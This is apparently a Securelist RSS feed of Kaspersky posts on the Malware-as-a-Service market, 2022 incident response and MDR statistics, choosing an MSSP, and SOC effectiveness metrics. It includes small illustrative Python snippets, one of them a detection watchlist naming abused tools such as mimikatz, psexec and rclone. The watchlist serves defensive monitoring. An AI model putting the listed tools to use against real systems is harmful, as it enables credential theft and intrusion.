SOC, TI and IR posts – Securelist https://securelist.com

Understanding Malware-as-a-Service https://securelist.com/malware-as-a-service-market/109980/ Thu, 15 Jun 2023 10:00:56 +0000

Money is the root of all evil, including cybercrime. Thus, it was inevitable that malware creators would one day begin not only to distribute malicious programs themselves, but also to sell them to less technically proficient attackers, thereby lowering the threshold for entering the cybercriminal community. The Malware-as-a-Service (MaaS) business model emerged as a result of this, allowing malware developers to share the spoils of affiliate attacks and lowering the bar even further. We have analyzed how MaaS is organized, which malware is most often distributed through this model, and how the MaaS market depends on external events.

Results of the research

We studied data from various sources, including the dark web, identified 97 families spread under the MaaS model since 2015, and broke these down into five categories by purpose: ransomware, infostealers, loaders, backdoors, and botnets.

As expected, most of the malware families spread by MaaS were ransomware (58%), infostealers comprised 24%, and the remaining 18% were split between botnets, loaders, and backdoors.

Malware families distributed under the MaaS model from 2015 through 2022

Despite the fact that most of the malware families detected were ransomware, the most frequently mentioned families in dark web communities were infostealers. Ransomware ranks second in terms of activity on the dark web, showing an increase since 2021. At the same time, the total number of mentions of botnets, backdoors, and loaders is gradually decreasing.

Trends in the number of mentions of MaaS families on the dark web and deep web, January 2018 – August 2022

There is a direct correlation between the number of mentions of malware families on the dark and deep web and various events related to cybercrime, such as high-profile cyberattacks. Using operational and retrospective analysis, we identified the main events leading to a surge in the discussion of malware in each category.

Thus, in the case of ransomware, we studied the dynamics of mentions using five infamous families as an example: GandCrab, Nemty, REvil, Conti, and LockBit. The graph below highlights the main events that influenced the discussion of these ransomware families.

Number of mentions of five ransomware families distributed under the MaaS model on the dark web and deep web, 2018–2022

As we can see in the graph above, the termination of group operations, arrests of members, and deletion of posts on hidden forums about the spread of ransomware fail to stop cybercriminal activity completely. A new group replaces the one that has ceased to operate, and it often welcomes members of the defunct one.
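
As an illustration of the kind of retrospective trend analysis described above, here is a minimal, hypothetical sketch of how monthly dark web mention counts could be screened for surges worth correlating with external events. The family data, the window size and the threshold factor are assumptions made for the example, not figures from our research.

```python
# Illustrative sketch (not Kaspersky's actual tooling): flagging surges in
# monthly dark web mention counts for a malware family. Numbers are made up.
from statistics import mean

def find_surges(monthly_counts, window=3, factor=2.0):
    """Return months whose mention count exceeds the trailing average by `factor`."""
    surges = []
    for i, (month, count) in enumerate(monthly_counts):
        if i < window:
            continue
        baseline = mean(c for _, c in monthly_counts[i - window:i])
        if baseline and count > factor * baseline:
            surges.append((month, count, round(baseline, 1)))
    return surges

mentions = [
    ("2021-09", 40), ("2021-10", 35), ("2021-11", 42),
    ("2021-12", 38), ("2022-01", 120),  # hypothetical spike after a high-profile attack
    ("2022-02", 55),
]
for month, count, baseline in find_surges(mentions):
    print(f"{month}: {count} mentions vs. baseline {baseline} -- check for related events")
```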

MaaS terminology and operating pattern

Malefactors providing MaaS are commonly referred to as operators. The customer using the service is called an affiliate, and the service itself is called an affiliate program. We have studied many MaaS advertisements, identifying eight components inherent in this model of malware distribution. A MaaS operator is typically a team consisting of several people with distinct roles.

For each of the five categories of malware, we have reviewed in detail the different stages of participation in an affiliate program, from joining it to achieving the attackers’ final goal. We have found out what is included in the service provided by the operators, how the attackers interact with one another, and what third-party help they use. Each link in this chain is well thought out, and each participant has a role to play.

Below is the structure of a typical infostealer affiliate program.

Infostealer affiliate program structure

Cybercriminals often use YouTube to spread infostealers. They hack into users’ accounts and upload videos advertising cracks, with instructions on how to hack various programs. In the case of MaaS infostealers, distribution relies on novice attackers known as traffers, who are hired by affiliates. In some cases, it is possible to de-anonymize a traffer using only a sample of the malware they distribute.

Telegram profile of an infostealer distributor

Translation:

Pontoviy Pirozhok (“Cool Cake”)
Off to work you go, dwarves!

Monitoring the darknet and understanding how the MaaS model is structured and what capabilities attackers possess allow cybersecurity professionals and researchers to understand how malicious actors think, predict their future actions, and forestall emerging threats. To inquire about threat monitoring services for your organization, please contact us at: dfi@kaspersky.com.

To get the full version of the report “Understanding Malware-as-a-Service” (PDF), fill in the form below.

The nature of cyberincidents in 2022 https://securelist.com/kaspersky-incident-response-report-2022/109680/ Tue, 16 May 2023 08:00:57 +0000

Kaspersky offers various services to organizations that have been targeted by cyberattackers, such as incident response, digital forensics, and malware analysis. In our annual incident response report, we share information about the attacks that we investigated during the reporting period. Data provided in this report comes from our daily interactions with organizations seeking assistance with full-blown incident response or complementary expert services for their internal incident response teams.

Download the full version of the report (PDF)

Kaspersky Incident Response in various regions and industries

In 2022, 45.9% of organizations that encountered cyberincidents were in Russia and the CIS region, followed by the Middle East (22.5%), the Americas (14.3%), and Europe (13.3%).

From an industry perspective, we offered help to government (19.39%), financial (18.37%), and industrial (17.35%) organizations most frequently.

In 2022, attackers most often penetrated organizations’ infrastructure by exploiting various vulnerabilities in public-facing applications (42.9%). However, compared to 2021, the share of this initial attack vector decreased by 10.7 pp, while the share of attacks involving compromised accounts (23.8%) grew. The share of malicious e-mail among the initial attack vectors continued to decline, comprising 11.9% in 2022.

In 39.8% of cases, the reported incidents were related to ransomware attacks. Data encryption remains the number-one problem our customers face. However, compared to 2021, the number of ransomware-related incidents dropped, and not every attack involving file encryption was aimed at extracting a ransom. In some of these incidents, ransomware was used to hide the initial traces of the attack and complicate the investigation.

Expert recommendations

To protect your organization against cyberattacks, Kaspersky experts recommend the following:

  • Implement a robust password policy and enforce multifactor authentication
  • Remove management ports from public access
  • Adopt a zero-tolerance patch management policy, or apply compensating measures, for public-facing applications
  • Make sure that your employees maintain a high level of security awareness
  • Use a security toolstack with EDR-like telemetry
  • Implement rules for detecting pervasive tools used by adversaries (a minimal example of such a rule follows this list)
  • Continuously train your incident response and security operations teams to maintain their expertise and stay up to speed with the changing threat landscape
  • Back up your data on a regular basis
  • Work with an Incident Response Retainer partner to address incidents with fast SLAs
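
As a small illustration of the recommendation about detecting pervasive adversary tools, below is a minimal sketch of a watchlist-style check over process-creation telemetry. The event format, field names and the tool list are assumptions for the example; a real deployment would rely on the detection engineering content of your EDR/SIEM rather than a script like this.

```python
# A minimal sketch, not a production detection rule: matching process-creation
# telemetry against a watchlist of dual-use tools often abused by attackers.
# The event format and the watchlist are assumptions for illustration.
WATCHLIST = {"psexec.exe", "mimikatz.exe", "anydesk.exe", "advanced_ip_scanner.exe", "rclone.exe"}

def triage_process_events(events):
    """Yield events whose image name is on the watchlist of pervasive tools."""
    for event in events:
        image = event.get("image", "").rsplit("\\", 1)[-1].lower()
        if image in WATCHLIST:
            yield {"host": event.get("host"), "image": image, "cmdline": event.get("cmdline")}

sample_events = [
    {"host": "srv-01", "image": r"C:\Windows\Temp\psexec.exe", "cmdline": r"psexec.exe \\srv-02 cmd"},
    {"host": "wks-17", "image": r"C:\Program Files\Editor\editor.exe", "cmdline": "editor.exe report.docx"},
]
for hit in triage_process_events(sample_events):
    print("suspicious tool usage:", hit)
```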

To learn more about incident response in 2022, including a MITRE ATT&CK tactics and techniques heatmap, and distribution of various incidents by region and industry, download the full version of the report (PDF).

For a deeper analysis of the vulnerabilities most commonly exploited by cyberattackers, download this appendix (PDF).

Managed Detection and Response in 2022 https://securelist.com/mdr-report-2022/109599/ Tue, 02 May 2023 08:00:15 +0000

Kaspersky Managed Detection and Response (MDR) is a service for 24/7 monitoring of and response to detected incidents, based on the technologies and expertise of the Kaspersky Security Operations Center (SOC) team. MDR allows threats to be detected at any stage of the attack – both before anything is compromised and after the attackers have penetrated the company’s infrastructure. This is achieved through preventive security systems and active threat hunting – the essential MDR components. MDR also features automatic and manual incident response and expert recommendations.

The annual Kaspersky Managed Detection and Response analytical report sums up the analysis of incidents detected by the Kaspersky SOC team. The report presents information on the most common offensive tactics and techniques and the nature and causes of incidents, and gives a breakdown by country and industry.

2022 incidents statistics

Security events

In 2022, Kaspersky MDR processed over 433,000 security events. 33% of those (over 141,000 events) were processed using machine learning technologies, and 67% (over 292,000) were analyzed manually by SOC analysts.

Over 33,000 security events were linked to 12,000 real incidents. Overall, 8.13% of detected incidents were of high, 71.82% of medium, and 20.05% of low severity.

Response efficiency

72% of 2022 incidents were detected based on a single security event, after which the attack was stopped right away. Of these, 4% were of high, 74% of medium, and 22% of low severity.

On average, in 2022, a high severity incident took the SOC team 43.8 minutes to detect. The 2022 figures for medium and low severity incidents are 30.9 and 34.2 minutes, respectively.
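
For context, detection-time figures like these are simple averages over resolved incidents. The sketch below shows the arithmetic on a few hypothetical incident records; the data structure is an assumption, not the format used by Kaspersky MDR.

```python
# Illustrative sketch with made-up data: mean time to detect per severity.
from collections import defaultdict

incidents = [
    {"severity": "high", "minutes_to_detect": 38.0},
    {"severity": "high", "minutes_to_detect": 49.6},
    {"severity": "medium", "minutes_to_detect": 30.9},
    {"severity": "low", "minutes_to_detect": 34.2},
]

totals = defaultdict(lambda: [0.0, 0])  # severity -> [sum of minutes, incident count]
for inc in incidents:
    totals[inc["severity"]][0] += inc["minutes_to_detect"]
    totals[inc["severity"]][1] += 1

for severity, (total, count) in totals.items():
    print(f"{severity}: mean time to detect = {total / count:.1f} min over {count} incidents")
```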

Geographical distribution, breakdown by industry

In 2022, 44% of incidents were detected in European organizations. Russia and the CIS are in second place with a quarter of all detected incidents. Another 15% of incidents relate to organizations from the Asia-Pacific region.

Industry-wise, industrial organizations suffered more incidents than any other sector. Most of the critical incidents were detected in government agencies and in industrial and financial organizations. It is worth noting, though, that a fair share of critical incidents across financial organizations was due to Red Teaming exercises.

Recommendations

For effective protection from cyberattacks, these are Kaspersky SOC team’s recommendations to organizations:

  • Apart from the classic monitoring instruments, deploy active threat hunting methods and tools that allow for early detection of incidents.
  • Hold regular cyberdrills involving Red Teaming to train your teams to detect attacks and analyze the organization’s security.
  • Practice a multilevel malware protection approach comprising various threat detection technologies – from signature analysis to machine learning.
  • Use the MITRE ATT&CK knowledge base.

See the full version of the report (PDF) for more information on the incidents detected in 2022, the main offensive tactics and techniques, the MITRE ATT&CK classification of incidents, and detection methods. To download it, please fill in the form below.

Selecting the right MSSP: Guidelines for making an objective decision https://securelist.com/selecting-the-right-mssp/109321/ Thu, 30 Mar 2023 10:00:06 +0000

Managed Security Service Providers (MSSPs) have become an increasingly popular choice as organizations follow the trend of outsourcing security services. Meanwhile, with the growing number of MSSPs in the market, it can be difficult for organizations to determine which provider is the best fit. This paper aims to provide guidance for organizations looking to select an MSSP and to help identify the benefits and drawbacks of using one.

To make an all-round choice, let’s try to answer the following questions:

  • What exact services do we need?
  • Why does my organization need an MSSP?
  • When does my organization need an MSSP?
  • Who should deliver the service?

MSSP Services

First, let’s start with what services we can expect. Here are some of the most common security services provided by MSSPs:

  • Security Monitoring

    24/7 monitoring of the organization’s network, systems, and applications to identify potential security threats and anomalies; can be provided as an on-premises solution (when data must not leave the customer infrastructure) or as a service.

  • Incident Response (IR)

    Responding to security incidents and breaches, investigating, and containing the incident. Incident Response can be provided in multiple forms, from recommendations for the customer IR team to pre-agreed response actions in the customer environment.

  • Managed Detection and Response (MDR)

    A combination of the previous two services. Usually, MDR is considered an evolution of classic monitoring and response services due to the utilization of advanced threat-detection techniques. Also, MDR supports embedded response capabilities within the platform, which are supplied and fully managed by the service provider.

  • Threat Intelligence (TI)

    Provision of intelligence on current and emerging threats to the organization’s security. The best-known and simplest form of TI is IoC feeds, which indicate the presence of known signs of attacks in the customer environment. But there are other deliverables, too, focused on different maturity levels of TI consumers within the organization.

    Note that the use of TI requires an in-house security team, so it is not possible to fully outsource it. TI data has to be applied internally to bring value.

  • Managed Security Solutions

    Multiple services focused on administering security solutions that are deployed in customer environments. These services are commonly bundled if the customer wants on-premise deployment of MSSP technologies.

There is an extended set of services not directly involved in day-to-day operations, but still valuable on a one-time or regular basis.

  • Digital Forensics and Incident Response (DFIR), or Emergency Incident Response

    The ultimate form of incident response that provides a full-scale DFIR service in case of critical incidents in the customer environment.

  • Malware Analysis

    A narrow-focus service providing extended reporting and behavior analysis of submitted malware. The service requires an in-house team to properly utilize the analysis results.

  • Security Assessment

    A group of services focused on the identification of target infrastructure or application vulnerabilities, weaknesses, and potential attack vectors. Among the best-known services are penetration testing, application security assessment, red teaming, and vulnerability assessment.

  • Attack Surface Management (ASM)

    A service focused on the collection of information related to the organization’s public-facing assets.

  • Digital Footprint Intelligence (DFI)

    A service focused on searching for, collecting, and analyzing organization-related threats in external sources. Typical deliverables include information about leaked accounts, organization-related traces in malware logs, posts and advertisements for the sale of infrastructure access, and a list of actors who may target the organization. In effect, DFI has taken over many TI tasks related to processing external sources.

As we can see, some services can replace the overall function of the in-house team (monitoring, MDR, assessment), while others can be considered additional support for the existing team (TI, malware analysis, DFIR). The overall scenario for MSSP usage is simple: engage one whenever a function is required but cannot be provided within the organization. So, a key task for the organization is to define its needs, priorities, and available resources.

Scenarios for MSSP involvement

Now let’s look at the scenarios in which involving an MSSP can provide significant value.

Scenario 1

The typical one: you need to establish a specific function quickly. In such cases, an MSSP will save you time and money, and provide value in the short term. This case is applicable whenever you want to implement or test some additional services in your SOC.

Scenario 2

You have to build a security function from scratch. Even if, in the end, all security services should be built in-house, the involvement of an MSSP is a good idea, since, as in scenario 1, it helps to get the service up and running. Later, you can transfer specific services to the in-house team, taking into account all the service aspects and expertise your team has obtained from the MSSP. At the same time, such an approach lets you implement security functions step by step, replacing MSSP services one by one, focusing on one topic at a time, and avoiding security interruptions due to missing services.

Scenario 3

Your business is growing rapidly. Whenever your business is growing, cybersecurity cannot always keep up. Especially in cases of company mergers and acquisitions, the IT landscape jumps to a new level that cannot be covered promptly by an in-house team. This case can transform into scenario 1 or 2, depending on the nature of the growth. If it is a one-time event, you will probably want to transfer the function to the in-house team later, once it is ready to handle the new volume.

All the more reasons to engage an MSSP

Besides these specific cases, there are common reasons that support engaging an MSSP over developing in-house capability. Here are some of them:

  • Lack of In-House Expertise

    Many organizations do not have the necessary in-house expertise to effectively manage and respond to security threats. Some roles and functions require deep knowledge and continuous growth of expertise, which cannot be maintained within the organization. An MSSP, on the other hand, works simultaneously with multiple customers, so the volume of incidents and investigations it handles is much higher, which generates more experience for MSSP teams.

  • Resource Constraints

    Smaller organizations may not have the resources to build and manage a comprehensive security program. An MSSP can provide the necessary security services to help these organizations mitigate security risks without having to hire a full security team and, in more complex cases, to maintain this full-scale team in the long term.

  • Cost Savings

    It can be expensive to build and maintain an in-house security program. Outsourcing security services to an MSSP can be a more cost-effective solution, particularly for smaller organizations. Also, the MSSP approach allows you to spread the budget over time, since establishing a service in-house requires significant investments from day one.

  • Scalability

    Fast-growing organizations may find it difficult to scale their security program at the same pace. An MSSP can provide scalable security services able to grow with the organization.

  • Flexibility

    With outsourcing, it is much easier to manage the level of service: from adjusting the SLA options with a particular MSSP to changing providers whenever the preconditions change or a better offer emerges on the market.

Overall, an MSSP can help organizations improve their security posture, manage risk, and ensure compliance while optimizing costs and resources. Having considered the reasons for involving an MSSP, to complete the picture we must mention not only the pros but the cons as well. Possible stop factors to think twice about are:

  • Increasing risk

    Every new partner extends the potential attack surface of your organization. During the contract lifetime, you should consider the risks of MSSP compromise and supply-chain attacks on the service, especially if the MSSP has a high level of privileges (usually required under a contract for advanced Incident Response). The provider can mitigate this risk by demonstrating a comprehensive cybersecurity program applied to its own infrastructure, along with independent assessments.

    Also, it is important to off-board the MSSP correctly in case of contract termination. This off-boarding should include careful access revocation and rollback of all changes made to the network, configurations, etc.

  • Lack of understanding

    Do you know what is within your infrastructure, and how business processes are tied to the IT environment? What is typical and normal in your network? Do you have an asset DB? What about an account registry and a regularly reviewed list of all privileges? I guess not all the answers were positive. Bad news: the MSSP will have an even less clear understanding of what is within the protected environment, since its only trusted source of information is you.

  • Need to control the MSSP

    It is essential to conduct a thorough analysis and evaluation of every service contract, particularly when it comes to selecting an MSSP. To achieve this, an expert from within the organization should be assigned to handle the contract and carefully scrutinize all details, conditions, and limitations. Additionally, the service delivery should be closely observed and evaluated throughout the lifetime of the contract. Generally, this means that it is not possible to entirely outsource the security function without establishing at least a small security team in-house. Moreover, the output from the service should be processed by an internal team, especially in cases where incidents, anomalies, or misconfigurations are detected.

In-house or MSSP for SMB

The decision between using an MSSP and building an in-house SOC for a small or medium-sized business (SMB) can depend on various factors, including the organization’s budget, resources, and security needs. Here are some benefits an MSSP provides in the SMB case:

  • Expertise

    An MSSP can provide a level of expertise in security that may not be available in-house, particularly for smaller organizations with limited security resources. Commonly, an SMB does not have a security team at all.

  • Cost

    Building an in-house SOC is an expensive undertaking that includes the cost of hiring experienced security professionals, investing in security tools and technologies, and building a security infrastructure.

  • Scalability

    As an SMB grows, its security needs may also grow. An MSSP can provide scalable security services that can grow with the organization without investing in additional security resources.

Overall, for many SMBs, outsourcing security services to an MSSP can be a more cost-effective solution than building an in-house SOC.

For large enterprises, as in other complex cases, the answer will be “it depends.” There are a lot of factors to be considered.

Finding the balance

Considering the pros and cons of outsourcing security services, I suggest finding the right balance. One balanced option is a hybrid approach in which the organization builds some services in-house and outsources others.

The first variation of the hybrid approach is to build the core functions (like Security Monitoring, Incident Response, etc.) yourself and outsource everything that would make no sense to build in-house. Such an approach lets you build strong core functions without wasting time and resources on functions that require narrow skills and tools. Any of the MSSP services mentioned in the extended category above are good candidates for this approach.

Another variant of the hybrid approach is to develop the expertise of incident responders, who know the environment and are able to respond to advanced attacks. Incident detection and initial analysis in this case can be outsourced, which gives better scalability and the ability to focus on serious matters.

The transition approach fits when you need to build a security function right here and now, but still plan to develop an in-house SOC later. You can start by outsourcing security services and gradually replace them one by one with in-house functions as the team, technologies, and resources become ready.

Choosing the right one

As a very first step, we have to define our needs, the services we are looking for, and the overall strategy we are going to follow in outsourcing security services, considering everything we have discussed before.

The next step is to choose the right provider. Here are the criteria to keep in mind during the screening procedure (a simple scoring sketch follows the list):

  • Look for expertise and experience

    Choose an MSSP with the necessary expertise. Pay attention to experience with clients in your region/industry as well as well-known global players. Consider the number of years in the market – it is usually simpler to find a proven partner than take a chance with a disruptive new player.

    Threat detection and cyberthreat hunting are related to security research. Check if the MSSP has appropriate research capabilities, which can be measured by the number and depth of publications related to new APT groups, the tools and techniques they use, and methods of detection and investigation.

    Another significant point is the team. All services are provided by individual people, so make sure that the MSSP employs qualified personnel with the required level of education and world-recognized certification.

  • Consider the MSSP’s technology

    Ensure that the MSSP uses relevant tools and technologies to provide effective security solutions. A simple example: if the MSSP is focused on Windows protection, it will not fit an environment built on Unix. There are more nuances regarding MSSP technology platforms, which we will come back to later.

  • Check for compliance

    Ensure that the MSSP follows industry compliance regulations and standards if applicable to your business.

  • Evaluate customer experience and support

    Find references and success stories and collect feedback from other companies – clients of the potential service provider. Focus on customer support experience, including responsiveness, availability, and expertise.

  • Consider SLA

    Consider the SLA type, what metrics are used, and how these metrics are tracked and calculated. And, of course, the SLA target values that the vendor can commit to.

  • Consider the cost

    Compare the cost of MSSP services from different providers and choose the one that, other things being equal, offers the best value for your business.

  • Security

    Does the vendor pay attention to its own security: cybersecurity hygiene, regular assessments by external experts? This is only a small part of what to check if you don’t want to lower your level of protection.

  • Ask for proof of concept (PoC)

    Mature players provide a test period, so you can have hands-on experience with most aspects of service provision and deliverables.
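
To turn a screening like this into the objective decision promised in the title, it can help to score candidates against the criteria above with explicit weights. Below is a minimal weighted-scoring sketch; the weights, criterion names and scores are illustrative assumptions to be replaced with your own priorities.

```python
# A minimal weighted-scoring sketch to compare MSSP candidates against the
# screening criteria. Weights, criteria, and scores are illustrative
# assumptions, not a prescribed methodology.
WEIGHTS = {
    "expertise": 0.25, "technology_fit": 0.20, "compliance": 0.10,
    "customer_support": 0.15, "sla": 0.15, "cost": 0.10, "own_security": 0.05,
}

def score(candidate_scores):
    """Weighted sum of per-criterion scores (each on a 0-5 scale)."""
    return sum(WEIGHTS[c] * candidate_scores.get(c, 0) for c in WEIGHTS)

candidates = {
    "Provider A": {"expertise": 5, "technology_fit": 4, "compliance": 5,
                   "customer_support": 4, "sla": 3, "cost": 2, "own_security": 4},
    "Provider B": {"expertise": 3, "technology_fit": 5, "compliance": 4,
                   "customer_support": 3, "sla": 4, "cost": 5, "own_security": 3},
}

for name, scores in sorted(candidates.items(), key=lambda kv: score(kv[1]), reverse=True):
    print(f"{name}: {score(scores):.2f} / 5")
```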

The technology question is a bit tricky. In most cases, we can split MSSPs into two big groups: the first uses enterprise solutions, the second uses self-developed tools or open-source software with customization.

The first group needs to share its revenue with the vendor providing the technology, but if you later decide to build an on-prem SOC platform, the migration can be simplified if you choose the same vendor’s platform. Also, you won’t need to implement too many changes in your environment. Furthermore, if the organization intends to adopt a transition approach and establish an in-house SOC based on a specific technology, the use of an MSSP with the corresponding technical solution can serve as an “extended test drive” for the chosen platform.

The second group usually focuses on a highly custom solution that lets the MSSP fine-tune the technology platform for better results. In a lot of cases, this can be a conglomerate of multiple tools and platforms, integrated to provide more advanced detection and analysis methods. Commonly this platform cannot be adopted by customers for independent usage.

Another question we should mention: is it worth splitting services between multiple providers? On the one hand, such diversity can help to choose the best provider for specific services; on the other, you can feel the synergy of multiple services provided by the same vendor in a bundle. E.g., if you have monitoring from one provider, the provision of DFIR by the same company will create positive synergy due to the ability to exchange information about historical incidents and to continuously monitor DFIR IoCs.

When buying defensive services, don’t forget about offensive assessments, and check the contract conditions for the ability to conduct red teaming, penetration tests, or cyber range exercises. Any type of assessment will be valuable for proving the value of the managed security services and training your team.

Summary

When selecting an MSSP, it is important for organizations to keep their security goals in mind and align them with the criteria used for evaluation. With a large number of players in the market, it is always possible to choose the one that best meets the organization’s specific requirements and strategy. Careful consideration of factors such as service offerings, reputation, technology, and cost will help organizations find the right MSSP to meet their security needs.

Understanding metrics to measure SOC effectiveness https://securelist.com/understanding-metrics-to-measure-soc-effectiveness/109061/ Fri, 24 Mar 2023 08:00:56 +0000

The security operations center (SOC) plays a critical role in protecting an organization’s assets and reputation by identifying, analyzing, and responding to cyberthreats in a timely and effective manner. Additionally, SOCs help to improve the overall security posture by providing add-on services such as vulnerability identification, inventory tracking, threat intelligence, threat hunting, log management, etc. With all these services running under the SOC umbrella, it largely bears the burden of making the organization resilient against cyberattacks, which means it is essential for organizations to evaluate the effectiveness of their security operations center. An effective and successful SOC unit should be able to justify and demonstrate the value of its existence to stakeholders.

Principles of success

Apart from revenue and profits, there are two key principles that drive business success:

  • Maintaining business operations to achieve the desired outcomes
  • Continually improving by bringing in new ideas or initiatives that support the overall goals of the business

The same principles are applied to any organization or entity that is running a SOC, acting as a CERT, or providing managed security services to customers. So, how do we ensure the services being provided by security operations centers are meeting expectations? How do we know continuous improvement is being incorporated in daily operations? The answer lies in the measurement of SOC internal processes and services. By measuring the effectiveness of processes and services, organizations can assess the value of their efforts, identify underlying issues that impact service outcomes, and give SOC leadership the opportunity to make informed decisions about how to enhance performance.

Measuring routine operations

Let’s take a closer look at how we can make sure routine security operations are providing services within the normal parameters to a business or subscribed customers. This is where metrics, service-level indicators (SLIs) and key performance indicators (KPIs) come into play; metrics provide a quantitative value to measure something, KPIs set an acceptable value on a key metric to evaluate the performance of any particular internal process, and SLIs provide value to measure service outcomes that are eventually linked with service SLAs. With regard to KPIs, if the metric value falls into the range of a defined KPI value, then the process is deemed to be working normally; otherwise, it provides an indication of reduced performance or possibly a problem.

The following figure clarifies the metric types generally used in SOCs and their objectives:

One important thing to understand here is that not all metrics need a KPI value. Some metrics, such as monitoring metrics, are measured for informational purposes only. They help track functional pieces of SOC operations, and their main objective is to assist SOC teams in forecasting problems that could degrade operational performance.

The following section provides some concrete examples to reinforce understanding:

Example 1: Measuring analysts’ wrong verdicts

Process: Security monitoring process
Metric Name: Wrong verdict
Type: KPI (internal)
Metric Description: % of alerts wrongly triaged by the SOC analyst
Target: 5%

This example involves the evaluation of a specific aspect of the security monitoring process, namely the accuracy of SOC analyst verdicts. Measuring this metric can aid in identifying critical areas that may affect the outcome of the security monitoring process. It should be noted that this metric is an internal KPI, and the SOC manager has set a target of 5% (the target value is often set based on the existing levels of maturity). If the value of this metric exceeds the established target, it suggests that the SOC analysts’ triage skills may require improvement, which provides valuable insight to the SOC manager.

Example 2: Measuring alert triage queue

Process: Security monitoring process
Metric Name: Alert triage queue
Type: Monitoring metric
Metric Description: Number of alerts waiting to be triaged
Target: Dynamic

This specific case involves assessment of a different element of the security monitoring process – the alert triage queue. Evaluating this metric can provide insights into the workload of SOC analysts. It is important to note that this is a monitoring metric, and there is no assigned target value; instead, it is classified as a dynamic value. If the queue of incoming alerts grows, it indicates that the analyst’s workload is increasing, and this information can be used by SOC management to make necessary arrangements.

Example 3: Measuring time to detect incidents

Service: Security monitoring service
Metric Name: Time to detect
Type: SLI
Metric Description: Time required to detect a critical incident
Target: 30 minutes

In this example, the effectiveness of the security monitoring service is evaluated by assessing the time required to detect a critical incident. Measuring this metric can provide insights into the efficiency of the security monitoring service for both internal and external stakeholders. It’s important to note that this metric is categorized as a service-level indicator (SLI), and the target value is set at 30 minutes. This target value represents a service-level agreement (SLA) established by the service consumer. If the time required for detection exceeds the target value, it signifies an SLA breach.
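
The three examples can be tied together in a single evaluation pass: monitoring metrics are only reported, missed KPIs are flagged internally, and SLI values above target are flagged as SLA breaches. The sketch below is a minimal illustration; the data structure and values are assumptions loosely based on the examples above.

```python
# A minimal sketch: checking collected metric values against their targets.
# Metric names mirror the examples in the text; values are hypothetical.
metrics = [
    {"name": "Wrong verdict", "type": "KPI", "value": 12.0, "target": 5.0, "higher_is_worse": True},
    {"name": "Alert triage queue", "type": "monitoring", "value": 140, "target": None},
    {"name": "Time to detect (critical)", "type": "SLI", "value": 41.0, "target": 30.0, "higher_is_worse": True},
]

for m in metrics:
    if m["target"] is None:
        # Monitoring metrics have no KPI/SLA target; they are tracked for information only.
        print(f"[monitor] {m['name']}: current value {m['value']}")
    elif m["higher_is_worse"] and m["value"] > m["target"]:
        label = "SLA breach" if m["type"] == "SLI" else "KPI missed"
        print(f"[{label}] {m['name']}: {m['value']} vs target {m['target']}")
    else:
        print(f"[ok] {m['name']}: {m['value']} within target {m['target']}")
```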

Evaluating the everyday operations of a practical SOC unit can be challenging due to the unavailability or inadequacy of data, and gathering metrics can also be a time-consuming process. Therefore, it is essential to select suitable metrics (which will be discussed later in the article) and to have the appropriate tools and technologies in place for collecting, automating, visualizing, and reporting metric data.

Measuring improvement

The other essential element in the overall success of security operations is ‘continuous improvement’. SOC leadership should devise a program where management and SOC employees get an opportunity to create and pitch ideas for improvement. Once ideas are collected from different units of security operations, they are typically evaluated by management and team leads to determine their feasibility and potential impact on the SOC goals. The selected ideas are then converted into initiatives along with the corresponding metrics and desired state, and lastly their progress is tracked and evaluated to measure their results over a period of time. The goal of creating initiatives through ideas management is to encourage employee engagement and continuously improve SOC processes and operations. Typically, it is the SOC manager and lead roles who undertake initiatives to fix technical and performance-related matters within the SOC.

A high-level flow is depicted in the figure below:

Whether it is for routine security operations or ongoing improvement efforts, metrics remain a common parameter for measuring performance and tracking progress.

Three common problems that we often observe in real-world scenarios are:

  • In the IT world the principle of “if it’s not broken, don’t fix it” is well known, and this mentality extends to operational units as well. Similarly, many SOCs prioritize current operations and only implement changes in response to issues rather than adopting a continuous improvement approach. This reluctance to change acts as a bottleneck for achieving continuous improvement.
  • Absence of a structured process to gather ideas for potential improvements results in only a fraction of these ideas being presented to the SOC management, and thus, only a fraction of them being implemented.
  • Absence of progress tracking for improvements – it’s not sufficient to simply generate and discuss ideas. Implementing ideas requires diligent monitoring of their progress and measuring their actual impact.

Example: Initiative to improve analyst triage verdicts

Revisiting ‘example 1’ presented in the ‘Measuring routine operations’ section, let us assume that the percentage of incorrect verdicts detected over the past month was 12%, indicating an issue that requires attention. Management has opted to provide additional training to the analysts with the goal of reducing this percentage to 5%. Consequently, the effectiveness of this initiative must be monitored for the specified duration to determine if the target value has been attained. It’s important to note that the metric, ‘Wrong verdicts’, remains unchanged, but the current value is now being used to evaluate progress towards the desired value of 5%. Once significant improvements are implemented, the target value can be adjusted to further enhance the analysts’ triage skills.

Metric identification and prioritization

SOCs generally do measure their routine operations and improvements using ‘metrics’. However, they often struggle to recognize if these metrics are supporting the decision-making process or showing any value to the stakeholders. Hunting for meaningful metrics is a daunting task. The common approach we have followed in SOC consulting services to derive meaningful metrics is to understand the specific goals and operational objectives of security operations. Another proven approach is the GQM (Goal-Question-Metric) system that involves a systematic, top-down methodology for creating metrics that are aligned with an organization’s goals. By starting with specific, measurable goals and working backwards to identify the questions and metrics needed to measure progress towards those goals, the GQM approach ensures that the resulting metrics are directly relevant to the SOC’s objectives.

Let’s illustrate our approach with an example. If a SOC is acting as a financial CERT, it is likely to focus on responding to incidents related to the financial industry, tracking and recording financial threats, providing advisory services, etc. Once the principal goals of the CERT are understood, the next step is to identify metrics that directly influence the outcomes of the CERT’s services.

Example: Metric identification

Goal: Ensure participating financial institutions are informed about the latest threats
Question: How can we determine the amount of time the CERT takes to notify other financial institutions?
Metric: Time it takes to notify participant banks after threat discovery

Similarly, for operational objectives, metrics are identified to track and measure the processes that support financial CERT operations. This also raises the issue of prioritizing metrics, as not all metrics hold the same level of importance. When selecting metrics, it is crucial to prioritize quality over quantity, and it is therefore recommended to limit the number of metrics collected in order to sharpen focus and increase efficiency. When prioritizing, the metrics that directly support CERT goals take precedence over metrics supporting operational objectives, because ultimately it is the consumers and stakeholders who evaluate the services rendered.

To determine the appropriate metrics, several factors should be taken into account:

  • Metrics must be aligned with the primary goals and operational objectives.
  • Metrics should assist in the decision-making process.
  • Metrics must demonstrate their purpose and value to both internal operations and external stakeholders.
  • Metrics should be realistically achievable in terms of data collection, data accuracy, and reporting.
  • Metrics must also meet the criteria of the SMART (Specific, Measurable, Actionable, Realistic, Time-based) model.
  • Ideally, metrics should be automated to receive and analyze current values in order to visualize them as quickly as possible.

Developing an incident response playbook https://securelist.com/developing-an-incident-response-playbook/109145/ Thu, 23 Mar 2023 08:00:00 +0000

